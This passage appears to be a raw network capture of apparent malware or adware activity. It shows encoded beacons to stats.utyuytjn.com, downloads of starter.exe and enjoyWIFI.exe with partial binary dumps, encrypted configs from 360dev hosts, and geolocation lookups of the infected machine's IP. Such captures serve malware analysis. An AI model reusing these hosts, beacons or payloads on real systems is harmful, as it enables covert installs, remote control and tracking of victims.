4230105240050008201226003002028191174093097085015249253208141045112106
1641041532071441782281401210521830440891301390391501060411192161820070
4609323820816116014716224101922818005712301605314721922618020816908706
6135015010043122181207135058170046153005008082156141098075058146029107
0981971491592051250710692452060750030390581421570070510092001501992361
5213023016417108619824709623709122003904407101323023411307005406600312
1194080061124035204232108168196236155043251110169251178129011071106192
0002451651561972260581082171280870842311892421941901511630250481010352
0717918604703221413609423909013023219313313408412824205022102022206506
0167025106081111003171"}

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:18 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 2510

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024080066
0261491621611282410382251340741031480912031071650811281290121342280902
3319122304413607624718016218320118502112724417913222619302322704018620
1129098236148236211159009141014061010220106242031014076018050173014023
1262371271712442550282161590462272022162422451761742000591471091222211
8101808319317202001505717205101821317600525118815215601712711618000220
9052132227054008025058184092218243028003031236170174061245213192036145
1101802490341500012350900670440990191700930770581161351101400700951740
6124715306518206509524205006317925017125417100315925014500805807911811
1075157010251012040092237180242117230216172148119037138231094202131202
2390100502441612312542301741020401381981431332472011101692382431532280
4611310602603403006705304820612400307116812506617004013905022314218606
0086205255162156223054255186059162246236205037116042088245085182197024
0231340691811640641812322060190952241290481872520312081441840301992450
2111413513703825307713915417200109008304619111825102315215410502003623
5016122182031041199060119003050162097226121131074163129081237183224243
0552342090001360491060510272230710261871220530340661571021381162031920
0302221119713508318423006706522908725022616003705115401606023824619500
1146098167249033019070038192146139191224250120151161029003097039092202
028152017086139039087084081032187102141015132112151226181001026212

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:18 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 3902

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024007218
1870850732312381921131201431440541961191072422381141360422281101760771
1900005802618204011820125504911616020113412310611802707602208216700102
1116153212015103131014099244080243019001113097015044149218013049044058
1290002242351550221071501900902240630590740131911181050051730152040770
6116207104813910616023312702204409202013122606617108003108721618602110
0142139144106038032112102173006194234042102242252210065031230088119169
1580741171870782170690030302380150370661020690801611772361751280841691
6407413810824300220719812607611123805907601224807706107607622413605011
5109096101047024006147252026057136150018109235237206254072019215156128
2521992180431410980511030351311110820631932370140810302430030022050230
7406420308905003119009022822723901716017318711508422508105103619103922
1191235162158135058068076210096047128025204223190124190156041161007054
0001050232200511211060441222351301511571480360841372420990362440892082
3111017508217020719704825212306913924116601212617810107006615218709008
6174241010123059148092143061195213113065123116053153207246229078155119
2031262232102491732360721291772311370780681921240481141851321031030610
6414119305220917905216722002613513701005709109818118623705125320710101
1142057119159107174241069032022035170104115137227080255076076013069238
128137248151229237043122152062130109156025083206083195003011247160

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:18 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1358

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024019151
1290412232011630680391640941910260260930272331191112541961482421262080
9912010022611407322909711019211910518122501603912217708500004304313717
9124105027145124152084024000188096028213194187209174167070156064218153
1460920530490161410500312131082141060541230711890752062331111792420671
3901601917112520503718608003214921323713119114600922701418615621220621
8231147067224133052065153047232089130016059039250194154231222219190018
0720701750341360711520111760490611141931651100300900382191540150932030
3315209301613510007422408617909625414109001714005920718618514304721825
0042164249194060227141041043173102197067212022226010196042077041017213
1710542251681031492391002370370900770671780090932370050410840261730690
4209216114809004000306809605901120418809204100203120715808304301002121
1013094156011037084002008094042210031109058030058204175206021111132044
1950871901020341021882021160432510470270581540421120200800721590812551
6323915609212709914324909713624904407823520609904102001710318221610208
4072100134156065203235122036191187247212218195205075027144136227131173
2551712101232280370071961272311661371391711410020690911260501541901130
66242110167130128039217136"}

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:18 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1406

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024016018
0670340950392060621031621381831201862462390940721560050280290090990642
0615000922901506120522001416603023011522315020117321417804609217505814
3148088233085068168032132089150242164211237160080047051072180126063119
1560421982202291041441681941422540821692060962551141810342091281772471
0224502815716301525400014617507305215914820119118810818013411725420508
9028230226174043031050105229138251044031128076076169192080149185234208
1192022072410770071392381591471921570321180311671341910970270380991190
9725313105009724218721416022401901409422103011609007703802614817703807
2093092207160083091105046224215160110118096112024222016155071231247116
1590501960441600830591190621410740452250110382450601292450151311651340
8707319602005822815300606711413208104224415908609403212405306612308805
6061029087108166245053019015138254090209164154055078114188215112212117
0652010272211142301942400411320060862122230282500921330810510631591881
1703819909019110219725323820225306400815415512504001202609205410019712
2102199251239149004245197188209003130179155110244113217177172208195021
0801561821482491140630090881521312400980881280030080060492332180672391
1418112514713016110816511505724404305404916012613709001601421204220822
8130"}

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:19 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1166

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024082212
0270131892050771802230950650180580250851240550710692531181592520092041
2621015112821914913821420806518918710110200601503507601913715603116609
2114175086103122168000186223125169130130084243234205117131184254149193
0620631040590230872540870090860432252272180331821742471240051652370342
3708319705410403208618821400603421824705305202507616003801807117520109
5072106126073107089003251009033224063107217224141227167189093231231220
0501741691302142520831180090990080671411441280630950492552461590131541
7224519401408724714915606324525224922810004722014009619815411210806420
8197084162023021063198092092167012042195028210116206125044082149063033
0652171110302541770641951791812392410100600382390231360382461111500720
9716521308005405115508419919607316719723521116919122020809324522124613
1014227229141171073003063193126158211192071110064131174087112004209068
1770560911860170172510521631940990332522292131362282110650460042261890
50153240099238064102072136154070013024085204"}

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:19 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1166

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024082212
0270131892050771802230950650180580250851240550710692531181592520092041
2621015112821914913821420806518918710110200601503507601913715603116609
2114175086103122168000186223125169130130084243234205117131184254149193
0620631040590230872540870090860432252272180331821742471240051652370342
3708319705410403208618821400603421824705305202507616003801807117520109
5072106126073107089003251009033224063107217224141227167189093231231220
0501741691302142520831180090990080671411441280630950492552461590131541
7224519401408724714915606324525224922810004722014009619815411210806420
8197084162023021063198092092167012042195028210116206125044082149063033
0652171110302541770641951791812392410100600382390231360382461111500720
9716521308005405115508419919607316719723521116919122020809324522124613
1014227229141171073003063193126158211192071110064131174087112004209068
1770560911860170170440292300091912442431580902452430351302481491541851
82225066185098149125232128163088143028211096"}

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:19 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1214

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330840220872040150182351531891501
5008202407420100800515309920112522506303102112510118308912319915316106
2011023027211251096191061178155250184180226010017102182102116005017175
1911971282461480890750851660371801950062000682371760662391060071480882
4806519018904003602915802109609004709921304909717611414611607015906013
8174086225135056238207047097017005171188135041147061207177088224177229
1371411582431460022480192481831192100540960801472052091251441791030702
3513311106706312509923816614410503514717606421217101008615123104402204
3144020169206090251246194195175052024133207233069245180042167176086054
1061140562281510960521831420830571992051341000261391681550960382500050
2106803620612807206501605810512210402920912804816515806420218113716216
9144117093027121148242060223074198174065175218026228159192251246206000
2522341950682131240022071220211102501431611992291320492512392442152041
5524524711509217520315219824303410114923412215024921012624115901511218
8028205241234107083245"}

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:19 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1982

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024010060
0221951810580121350710352371522531262522151410960831490391820320021451
7410816104106415719921613523123402000004810822308209414112608702619618
7167133214067175096186179007048016017195097115089063047142253191197152
1142381870010691990170711902190490190390670260990672170532391542011270
0411417214506412913908324515622325423604311615321618114617506425008003
9222225073247106191208144048101057038136180193084204007152122054047236
0672541161080911742042490781960030370480021742202202140370180501542142
1615701818915402414322016710618920820302415421713325406123413300312708
6226188033132164161088149231216067240023115015024147000196180171068253
0610721830491050460520540780811251842362361720621690130242271290820292
1719114900121920413422604414522019923704818325419903816804812606220200
2226170066185119027191094240222069112172136133238106245085241109169106
0290311720990671091502022281950302261541731641532430881731590902080382
3218500607107605205213519201510514203009504718407903515103710605719106
2246194118026038007053057191140108106134115164043065179050083114247115
1522191940240641061781162500001900220362132161611382412411742071561202
1913211607806200508213114504523420621013913816500607901705104110309416
9057076185057126038201157209127203076170020239142234193165177171099240
091199145219172194086160170116003021095176179034189006080208114048

<<< skipped >>>
HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:19 GMT

{"d":"OK"}....

POST /StatisticsService.svc/V1/JSON/Lee HTTP/1.1

Content-Type: application/json; charset=utf-8

dataType: json

Host: stats.utyuytjn.com

Content-Length: 1214

Expect: 100-continue

HTTP/1.1 100 Continue

....

{"request":"0631462230990081771352540191321201192020260030102222210091
2822304323112919010107711002711117025007110610709420608505023719314805
6004057081120213032078203009192226127096078213170137216113245024168166
2411110850621421692501911820581791812330842170891601450782110120341760
2918904420117716819724221922502209210313221708313919420706907904720206
4163077219044084217023205096058050149181176096090071222222055203132048
2141112040730260560351621540781760221150300611150042191660310411911571
6319709521812904314210821614219907016811719104021924305400808913801410
8096249151216218147150077235113183213072049229176236254172248075133227
0781021752270280630071250661341650480470180070642010861981480171731840
7821605013304506702802407016810311113020907911024709014619416311720303
6141155125238242154166082074151143104023232249212003010200198045202004
1140210501231281051542520842030341761622331301660981170580410151352480
2723121510901810211616819518201009224112906013319423403519019221305807
1103010144237000099198147057090129061213208159204010088252101161105161
0282521800242271452511150011670121450322190980151582231570261801971931
3124511017620411911412816216708419414014419206715518611915813106114901
3201065208146046205224"}

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 10

Content-Type: application/json; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:19 GMT
{"d":"OK"}..

GET /p.ashx?e=r3 8Pyd9F6DAE3Cc4HiKowuL6dbzJjjozsPLTnml9raFClMIXcvfjiAvELRpepitBzKZ50kz8RPTyCp7gBaLmAnbpHOoKgPrbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPugw5PM1v4VCSA/hy5KOoHpcOMdWydF3qmdPbOQmglGcMHVwcwALnkpTzGrd1qaYrT/x86G1gblWOAcscFJ1r9xERphBdJN6GXYjxBRsCc8TDP45Ec68ZTPv0jifF/l6GPdeKAuFl6o0RTlK2jIuC8gitLYy8gIkejZr7qNb0EkX4cxIGDgk1EiHjE41dAxTp/t1gKvH5sVeXr9JcnVpDRrarVcATOywF31SN rk7zZezTxeuxqeK S59it mSQhSNSh45qAmyElt93bQH5bkaM479BnD01mhb3oMX8fofoEbEUK/lLzsEwg5AepPVk5G17OgBc8Iga2q7Gimry 1ppvFWj5nURHQ/2GZlHsaGxkNa/vJW8ChtAyEG6G02p03x5nPU473iN3gFKkc9X20jhsnfr JnqGlF3qCwRqkDTwEu4miNNOz8wBuFrwejlnHLsZG7yf0b3RaiIiCvz98Qb6fXGzh9ihtl8DD8oXlAmQhvbEFx3DbWU= HTTP/1.1

User-Agent: Moz/5.0 (compatible; MSIE 9.0; Win NT 6.1)

Host: d3jx96othz2l8y.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 22:04:22 GMT

X-Cache: Miss from cloudfront

Via: 1.1 9740f884e58cfb465c19a8a2b144f34f.cloudfront.net (CloudFront)

X-Amz-Cf-Id: oXsmPJqsQd1u6GWN9Q_WcM6AVw30DDjIi4a9lw9O_pKgOq__iHrmDQ==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 22:04:22 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 9740f884e58cfb465c19a8a2b144f3
4f.cloudfront.net (CloudFront)..X-Amz-Cf-Id: oXsmPJqsQd1u6GWN9Q_WcM6AV
w30DDjIi4a9lw9O_pKgOq__iHrmDQ==..

GET /MaxMind.asmx/GetGeoInfo HTTP/1.1

Host: madmax.utyuytjn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Cache-Control: private, max-age=0

Content-Type: text/xml; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Tue, 29 Aug 2017 21:57:11 GMT

Content-Length: 184
<?xml version="1.0" encoding="utf-8"?>..<string xmlns="http:/
/temptempuri.org/">194.242.96.218,UA,Ukraine,07,Kharkiv,,49.9808044
433594,36.2527008056641,0,0,Kharkivs'ka Oblast'</string>HTTP/1.1
 200 OK..Cache-Control: private, max-age=0..Content-Type: text/xml; ch
arset=utf-8..Server: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X
-Powered-By: ASP.NET..Date: Tue, 29 Aug 2017 21:57:11 GMT..Content-Len
gth: 184..<?xml version="1.0" encoding="utf-8"?>..<string xml
ns="hXXp://temptempuri.org/">194.242.96.218,UA,Ukraine,07,Kharkiv,,
49.9808044433594,36.2527008056641,0,0,Kharkivs'ka Oblast'</string&g
t;..

GET /iplookup/iplookup.php HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK

Server: Sina

Date: Tue, 29 Aug 2017 21:57:35 GMT

Content-Type: text/html; charset=gbk

Content-Length: 20

Connection: close

DPOOL_HEADER: tyr105

Set-Cookie: INTDPOOL=dc04044687467eb79001316b5643db06;Path=/

POOLPOOL: intdpool

DPOOL_LB7_HEADER: skuld145

1.-1.-1...............

GET /apdata/installers/auto/exe/starter.exe HTTP/1.1

Host: cdn.piytrwd.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Tue, 29 Aug 2017 21:56:59 GMT

Keep-Alive: timeout=10

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: 1503920630

Cache-Control: max-age=86400

Content-Length: 2554368

Content-Type: application/octet-stream

X-HW: 1504043819.dop001.am4.t,1504043819.cds017.am4.c

Last-Modified: Mon, 28 Aug 2017 11:43:50 GMT

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........vbbJ..1J..1
J..1GE.18..1GE.1i..1GE.1...1Co.1O..1J..1...1...1N..1GE.1K..1J..1K..1..
.1K..1RichJ..1........................PE..L......Y.................>
;...........3.......P....@..........................@'...........@....
..............................P..<........5....................&.tN
...R..8...........................x@..@............P..................
.............text....<.......>.................. ..`.rdata..2...
.P.......B..............@..@.data...@M...`...&...N..............@....r
src....5.......6...t..............@..@.reloc..tN....&..P....&.........
....@..B..............................................................
......................................................................
......................................................................
......................................................................
...........................................................J..v.......
...H.J..&...h.KI..)"..Y............L.J......h.KI..."..Y............P.J
..F...h.KI...!..Y............T.J......h.KI...!..Y.h`.J.. .....$.KI...!
..Y.h.KI...!..Y../U....@...J....%...`.J....X.J........P.J........\.J..
......T.J......hH.J....QI.......;.s.j....PI.3...................U.....
S.].VW...M..33..K..}..M...F..E.....f;V.........(......u;.E..x8..~~.s0.
F.j.h......WP.C........t}.F..E.Wj.P.F.......G.V......[.....tY.s0.F..E.
j.h.....6P.C........t:.6.F..~..E..}.PW..^...~..M........(.}.G.}...

<<< skipped >>>

GET /enjoyWiFi/enjoyWIFI.exe HTTP/1.1

Host: yeawindows.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Type: application/octet-stream

Last-Modified: Tue, 15 Aug 2017 08:50:16 GMT

Accept-Ranges: bytes

ETag: "c3f3e84a315d31:0"

Server: Microsoft-IIS/7.5

Date: Tue, 29 Aug 2017 21:57:03 GMT

Content-Length: 2152448

MZ......................@...................................0.........
..!..L.!This program cannot be run in DOS mode....$......./.x.k...k...
k....t..x....t.......t..t.......j....H..h...P...p.......e...........P.
......P...N.......p...k...Q.......&.......j...k...j.......j...Richk...
........................PE..L......Y.................f................
........@..........................P!...........@.....................
........................@..................... .H.......p.............
..............0...@............................................text...
.d.......f.................. ..`.rdata...l.......n...j..............@.
.@.data...x........p..................@....gfids...............H......
........@..@.tls.................T..............@....rsrc...@.........
...V..............@..@.reloc..H..... ....... .............@..B........
......................................................................
......................................................................
............................................U...8.P..cU..h.@K.........
].....U... .P..CP..h.@K.........].....U...h.P..#P..h.@K..`......].....
U.....P......h.@K..@......].....U.....P......h.@K.. ......].....U.....
P...H..h.@K.........]........P..v...h.AK......Y...........h..N....P..q
...h.AK......Y......j..*...h AK.....N....P.............P....P....^P..=
...hJAK..x...Y.hTAK..l...Y.h^AK..`...Y.hiAK..T...Y.. `P......hsAK..>
;...Y......U..j.h..K.d.....Pd.%....Q.XaP...?...XaP...XaP.......\aP....
..OB...XaP..`aP..E......)...h.AK.......M....d........]............

<<< skipped >>>

POST /temptrack/Store HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: 360devtraking.website

Content-Length: 224

Expect: 100-continue

Accept-Encoding: gzip

HTTP/1.1 100 Continue

....

order="/LsQENRBY8s/42Z7hB2hIbbJOrFHSz783Guu2YFsHqgotRf5tNyZ/f7EJjH7FqW
kyQ69MSDCskWEPAPd4zKQ9z8QZG51X3uD anObGgA ulRLJNENgb4BlqEoQRcKzWWJP4fG
h0wqpEg8Fp5Eb4n2ihL2777krtw7WWMWeOfCx9JAq6HW00D 8WjhbUYCkYchvFi 3sGoTB
Sjizu/rVKwQ=="

HTTP/1.1 200 OK

Server: nginx/1.10.1 (Ubuntu)

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: close

Cache-Control: no-cache

X-RateLimit-Limit: 60

X-RateLimit-Remaining: 59

Date: Tue, 29 Aug 2017 21:57:39 GMT

Content-Encoding: gzip

14........................0..

GET /black/mirenda/3/default/UA.xml HTTP/1.1

Host: room1.360dev.info

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Tue, 29 Aug 2017 21:56:58 GMT

Content-Type: text/xml; charset=utf-8

Content-Length: 122028

Last-Modified: Tue, 29 Aug 2017 21:30:03 GMT

Connection: keep-alive

ETag: "59a5dcdb-1dcac"

Accept-Ranges: bytes

7k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxVMLJ5unF436kvxCho6i6BmrLO5g9
UBYDIko4F2swzSRYsSL6QIKntvduhHbI30 kwvh8M0f3XLlvFV/lryeWX2zihnedKEe6SX
ALdPifc559aF1fA5n2j/kaLkAoqw9LDCx1Bb8ZIRPwC4/LB396IjgjLSd7iXRr30NK2ekD
de/4lmwtALQumjkkO1AvAy/xuppZj6wcFIHfzYiQK7nd9y8YfbYO1MmCcWTts77Yfag/JQ
  vPMY6seytsMOYbk/4gkW5AWq9AJpwh5yT0ZMg1fCMBb5yXNJkEyWQd3mRl3WK2M1yR6m
MFciUxeqdLKIfMqjxCX9nPusCmkEqAICoAdNM8sAjIq 8p6fJn1WsUaWlKqvJHAsWqwwHw
BkplXeClTmmNzX5jY1m6ds4M5GBIJjEp8prv9UpExkZlZN/puGJDnIbGnURgmNRE9pjhkV
4TrhteKoRhRAzCqIztVHbiJ7MaBf OmIuCXZPea6CgU7Wl6hS9Jvw0uktRU2O w3ze3pJW
qelxvesFW4hK4ESj6KHaZ0FgLjn9KuDHjpNKw91mBFkIaiH ChcrkhOAhT0GA7/4iSpLKD
RMILn4IJCPzLaKK2Wk1O6o7hvNIaEfexsy5HKXLtz ozD1BrTi8LXz/NOmWc8MSf4rKthn
A VTEJxmvovcdgStVsPNOne8dA6FodZlymwdIpjwYgLjeRVxHSO6vP/APfaHtKMdzrCahb
y3HzE/GCB7EB2vAkDVb9MovNdPFuZ6Ilv6Ut7JysyFR4Oq87hlbII5ZNbbw5vWzgeKU9f3
W4IaEWdBrtHmPy7zdgabhwgD/hUFzFSV3Ntg8GmdK14kSXIbdgUktDNSZdY0WU1lTp9dPw
tw883HfFvHK7q2dOc0nl3oa/uwdIiyhxHZ2kqLfEHDqrmGh5Ja14Tz/h06e879D6cRMHfh
FLoHpKrVN1Huz6OioBtTq0XHZWkxumW9AucA7YmX5PnPBM0Xq9jxZoA6Ejq/iJIepsl1si
Bdp2S BvTr7uGYDMIl7ALMF9V/krD95jCmaHwDP2J9QLni5lLnbCWs3L0J95/M/Tz99IB6
m0R0mOv/sOIr7N pNRImcbVulM2m0mh/oWJVoAV5CC7FrQcsLhh6ZUSIBP1R4edcD/o7W7
hjqkQUIwa0fDKbNK5EVIjRD5UIl x6c1nmJJyRCdfrGgb3czAz/oSEaHmZyZkVwhX1cLMM
vJ6FQmOdV  JKMJhUu0iW77yxyj5VKtPjNBT JyOSa8h7xKLitc/SIkuF9 r/uJq7K6and
e8J9Q//D7YVXhIVpsRMa8RU7pVfdL3qC UHmisWxhtGl6kI EPjJ2P9fDabWeFb37qN0Vx
i50kvCr6lK676t Vw2ZtGjCobjvNXndK/CvSYv amMgT946DjTy4RZpXApkuOgCGrISLVp
8deVPdBKQZI1CV48dtnfkmszIqo2AAEStqhew3R8szoDuNtdTVJDFViOThvlDaqok

<<< skipped >>>

GET /black/prisonbreak/3/default.xml HTTP/1.1

Host: room1.360dev.info


HTTP/1.1 200 OK

Server: nginx/1.10.3 (Ubuntu)

Date: Tue, 29 Aug 2017 21:56:59 GMT

Content-Type: text/xml; charset=utf-8

Content-Length: 300

Last-Modified: Tue, 29 Aug 2017 21:30:01 GMT

Connection: keep-alive

ETag: "59a5dcd9-12c"

Accept-Ranges: bytes

7k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxXHjeGWnXg1XhM3eFHz gT8HGVWL1
a3l275CE67m1uTJmHIplji9T3rv2WwyJAaWjxPYUo8U5x/jL/IJ66wkybBNb2pNbOSRdH2
gHg0bo86voenozycTO6p7Q0uBySq5l8LrKL6GyeWDJBuA5t8E97eoRTlOhOzmGRi7Eh3SD
WtRwNli1bT9fc4wMterinBsY2apHAtlNh0LFYaF78PLtKRbbfzesup0U/3ayH9Q7KcAZcl
V ISICRqPs80LZn2b0Y=HTTP/1.1 200 OK..Server: nginx/1.10.3 (Ubuntu)..Da
te: Tue, 29 Aug 2017 21:56:59 GMT..Content-Type: text/xml; charset=utf
-8..Content-Length: 300..Last-Modified: Tue, 29 Aug 2017 21:30:01 GMT.
.Connection: keep-alive..ETag: "59a5dcd9-12c"..Accept-Ranges: bytes..7
k92I2inPflHCBVZUy1dDfuK93Od3aZZ5u05dtKJqxXHjeGWnXg1XhM3eFHz gT8HGVWL1a
3l275CE67m1uTJmHIplji9T3rv2WwyJAaWjxPYUo8U5x/jL/IJ66wkybBNb2pNbOSRdH2g
Hg0bo86voenozycTO6p7Q0uBySq5l8LrKL6GyeWDJBuA5t8E97eoRTlOhOzmGRi7Eh3SDW
tRwNli1bT9fc4wMterinBsY2apHAtlNh0LFYaF78PLtKRbbfzesup0U/3ayH9Q7KcAZclV
 ISICRqPs80LZn2b0Y=..

GET /xml/ HTTP/1.1

Host: freegeoip.net

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Tue, 29 Aug 2017 21:56:58 GMT

Content-Type: application/xml

Content-Length: 363

Connection: keep-alive

Set-Cookie: __cfduid=d581a39b5ab13188dd7d153dfba1628871504043818; expires=Wed, 29-Aug-18 21:56:58 GMT; path=/; domain=.freegeoip.net; HttpOnly

Vary: Origin

X-Database-Date: Thu, 03 Aug 2017 06:09:19 GMT

X-Ratelimit-Limit: 15000

X-Ratelimit-Remaining: 14999

X-Ratelimit-Reset: 3600

Server: cloudflare-nginx

CF-RAY: 3962c36757de8ace-KBP
<Response>..<IP>194.242.96.218</IP>..<CountryCode
>UA</CountryCode>..<CountryName>Ukraine</CountryName
>..<RegionCode>63</RegionCode>..<RegionName>Khark
ivs'ka Oblast'</RegionName>..<City>Kharkiv</Cit
y>..<ZipCode></ZipCode>..<TimeZone>Europe/Kiev<
;/TimeZone>..<Latitude>49.9808</Latitude>..<Longitud
e>36.2527</Longitude>..<MetroCode>0</MetroCode>.&
lt;/Response>.HTTP/1.1 200 OK..Date: Tue, 29 Aug 2017 21:56:58 GMT.
.Content-Type: application/xml..Content-Length: 363..Connection: keep-
alive..Set-Cookie: __cfduid=d581a39b5ab13188dd7d153dfba162887150404381
8; expires=Wed, 29-Aug-18 21:56:58 GMT; path=/; domain=.freegeoip.net;
 HttpOnly..Vary: Origin..X-Database-Date: Thu, 03 Aug 2017 06:09:19 GM
T..X-Ratelimit-Limit: 15000..X-Ratelimit-Remaining: 14999..X-Ratelimit
-Reset: 3600..Server: cloudflare-nginx..CF-RAY: 3962c36757de8ace-KBP..
<Response>..<IP>194.242.96.218</IP>..<CountryCode
>UA</CountryCode>..<CountryName>Ukraine</CountryName
>..<RegionCode>63</RegionCode>..<RegionName>Khark
ivs'ka Oblast'</RegionName>..<City>Kharkiv</Cit
y>..<ZipCode></ZipCode>..<TimeZone>Europe/Kiev<
;/TimeZone>..<Latitude>49.9808</Latitude>..<Longitud
e>36.2527</Longitude>..<MetroCode>0</MetroCode>.&
lt;/Response>...<<< skipped >>>

GET /p.ashx?e=szy0EO73D1jnGREG7sgANyQihONqx/i6WB8r2ztgmWgO7l/wy05vug49NnWHhDotcnP 8TnBr fqiaV62hwPcFU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/zEF4Meyc2 EE8SFHLIEPsMWQZi5gE7wZ HTTP/1.1

